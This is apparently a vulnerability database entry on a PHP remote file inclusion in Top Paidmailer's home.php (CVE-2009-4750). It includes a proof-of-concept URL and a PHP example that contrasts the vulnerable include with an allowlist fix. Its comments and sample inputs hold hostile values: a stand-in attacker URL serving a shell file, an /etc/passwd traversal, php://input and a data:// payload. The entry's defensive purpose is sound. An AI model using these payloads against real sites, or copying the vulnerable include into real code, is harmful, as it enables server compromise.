Phppower Top Paidmailer 'home.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1118100    Vulnerability type: Code injection
Published: 2009-07-13    Updated: 2009-07-13
CVE: CVE-2009-4750    CNNVD-ID: CNNVD-201003-409
Platform: PHP    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/34793
https://www.securityfocus.com/bid/43626
https://cxsecurity.com/issue/WLB-2010030256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-409
|Vulnerability details
The home.php script in Top Paidmailer contains a PHP remote file inclusion vulnerability: the value of the page request parameter is passed to a PHP include without validation. A remote attacker can supply a URL in the page parameter to include a file from an attacker-controlled server and execute arbitrary PHP code in the context of the web server process.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/43626/info

Top Paidmailer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

http://www.example.com/patch/home.php?page=[rfi]

In the proof-of-concept URL, [rfi] is a placeholder for the URL of an attacker-hosted file (for example a plain-text file containing PHP code); the path prefix /patch/ reflects the installation directory used in the original report and will differ between installations. Remote inclusion requires allow_url_include to be enabled in php.ini; with it disabled, the same unvalidated include still permits local file inclusion.
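The advisory does not publish the source of home.php, so the following is an added example (not Top Paidmailer's code) that reconstructs the assumed vulnerable pattern, a user-controlled include path, and places it beside a hardened version that resolves the page parameter through a fixed server-side allowlist. The template names and paths are invented for illustration.

```php
<?php
// Added example, not code from Top Paidmailer. The flawed script is not
// published in the advisory; the vulnerable function below reconstructs the
// typical pattern behind a "page" parameter file inclusion (assumption).

// --- Vulnerable pattern (assumed to resemble home.php) -------------------
// With allow_url_include=On (and allow_url_fopen=On), a request such as
//   home.php?page=http://attacker.example/shell.txt
// makes the interpreter fetch and execute the remote file. Even with
// allow_url_include=Off the same code still allows local file inclusion
// (page=../../../../etc/passwd) and wrapper abuse (page=php://input).
function render_page_vulnerable(string $page): void
{
    include $page;   // request-controlled include path: the defect
}

// --- Hardened version ----------------------------------------------------
// Map the external page name to a fixed list of templates that lives on the
// server; the request never chooses a filesystem path or a URL.
// (Template names and paths are assumptions for this example.)
const PAGE_TEMPLATES = [
    'home'    => 'templates/home.php',
    'members' => 'templates/members.php',
    'stats'   => 'templates/stats.php',
];

// Returns the template path for a known page name, or null for anything
// else. Exact-match lookup means no traversal sequence, null byte, scheme
// (http://, data://) or stream wrapper (php://) can reach the include.
function resolve_page(?string $page): ?string
{
    if ($page === null || $page === '') {
        $page = 'home';
    }
    return PAGE_TEMPLATES[$page] ?? null;
}

function render_page_hardened(?string $page): void
{
    $template = resolve_page($page);
    if ($template === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . $template;
}

// Demonstration: how the allowlist treats hostile values of ?page=.
$samples = [
    'home',
    'http://attacker.example/shell.txt',
    '../../../../etc/passwd',
    'php://input',
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==',
];
foreach ($samples as $input) {
    printf("%-52s -> %s\n", $input, resolve_page($input) ?? 'rejected');
}
```

Only the first sample resolves to a template; every other value, including the remote URL from the proof of concept, is rejected before any include runs. Independently of the code fix, set allow_url_include = Off in php.ini (the default since PHP 5.2) so that an include can never resolve a remote URL, and keep allow_url_fopen disabled where the application does not need it; these settings limit the impact of an unvalidated include to local files but do not remove the underlying defect.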
|Affected products
Vendor: Top Paidmailer    Product: Top Paidmailer    Version: 0 (no specific version given in the source records)
|References

Source: XF
Name: toppaidmailer-home-file-include(51661)
Link: http://xforce.iss.net/xforce/xfdb/51661
Source: MISC
Link: http://www.packetstormsecurity.org/0907-exploits/toppaidmailer-rfi.txt
Source: OSVDB
Name: 55797
Link: http://www.osvdb.org/55797
Source: SECUNIA
Name: 35723
Link: http://secunia.com/advisories/35723